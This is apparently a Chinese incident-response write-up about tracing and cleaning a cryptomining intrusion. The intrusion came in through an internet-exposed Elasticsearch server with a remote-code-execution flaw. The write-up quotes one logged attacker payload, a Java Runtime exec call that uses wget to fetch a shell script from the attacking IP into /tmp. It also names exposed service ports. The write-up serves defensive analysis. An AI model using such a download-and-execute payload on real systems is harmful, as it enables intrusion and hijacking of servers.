一次专有云挖矿事件的应急

起因：云安全巡检，发现安骑士告警了恶意文件下载和挖矿事件。

[h3]1.判断事件真实性和事件类型[/h3]

发现事件方式：云盾告警
下载恶意程序时间：2月27日 01:15:01
挖矿程序执行事件：2月27日 07:37:46

从事件详情上看，可以判断事件是真实有效的挖矿事件.

截图

[h3]2. 进行阻断隔离[/h3]迅速找到业务方负责人，在确认业务可以短暂隔离的情况下，配置acl只允许我的ip访问服务器。
[h3]3. 入侵溯源[/h3]云盾日志检索时间：2月27日00:00～2月27日01:30，定位黑客是什么方式进来的。
第一步肯定是看ssh是不是有暴力破解和登陆异常，然鹅没有。2月27日00:00到2月28日0:00，只有2条通过堡垒机正常登陆记录，这两条ssh登陆记录是我们上去排查溯源的登陆记录。

检索日志：2月27日01:15～2月27日08:05，定位黑客对操作系统做了哪些操作

从攻击量来看，攻击从01:30一直持续到早上8点左右。预判黑客是在01:30之前发现漏洞并利用了漏洞得到了系统权限。
通过01:30之前的日志排查，发现某互联网ip大量对服务器各端口发起请求。这非常异常，因为政务网内的业务很少有互联网ip发起大量请求。定位该ip
写这篇文章时间已经隔了20多天，已无具体的截图。总之，0:00～1:00这个区间，只有185.181.10.234这个ip发起了大量异常请求。
然后以185.181.10.234为检索关键字，得到结果可以让我很肯定他就是攻击源。因为他在短时间内，请求了80，8080，9001，8161，9200，9000服务，并且是访问频率异常。
最后通过安全组的排查也核实了一件事情8080，9001，8161，9200，9000没有做任何限制，即互联网上ip可以访问这些端口上的业务。

8080：tomcat
9001:supervisor
9000:fastcgi
9200:elasticsearch
8161:activemq

黑客肯定是通过上面几个端口入侵进来的，对每个应用日志进行分析。tomcat没有暴力破解或者文件上传日志，activemq的日志文件已经有十多天没有更新了，所以也不可能通过activemq漏洞进来。9000和9001先忽略掉，因为不会分析这2个应用日志。
最后查看elasticsearch日志，ll -t通过时间排序，最近被修改的日志是realesate.log，修改时间和被入侵的时间非常匹配。在/var/elastic/logs/re alesate.log发现了异常。

1
java.lang.Runtime().getRuntime=().exec(\"wget http://185.181.10.234/E5D****/init.sh -P /tmp/sssooo\").getText()
很明显了，黑客通过java指令下载了挖矿程序。网上搜了下：elasticsearch低版本存在RCE。
[h3]4.查杀[/h3]

手动查看/etc/cron 和 /etc/crontab,发现了恶意启动项。通过ll -t命令对tmp，elastic，opt，etc/init.d/ /root/sshd_config 进行排查，删除黑客的恶意程序。
安装rkhunter，对服务器进行一个全面检查。
检查该服务器是否对内网横向扫描，通过hitory和netstat判断，结果为：无
7天内重点观察巡检

[h3]5.总结[/h3]本次入侵事件没有数据泄漏迹象，黑客并没有完全控制服务器权限，因为ssh端口他无法连接（做了安全组）。所以本次事件的影响性，占用cpu挖矿。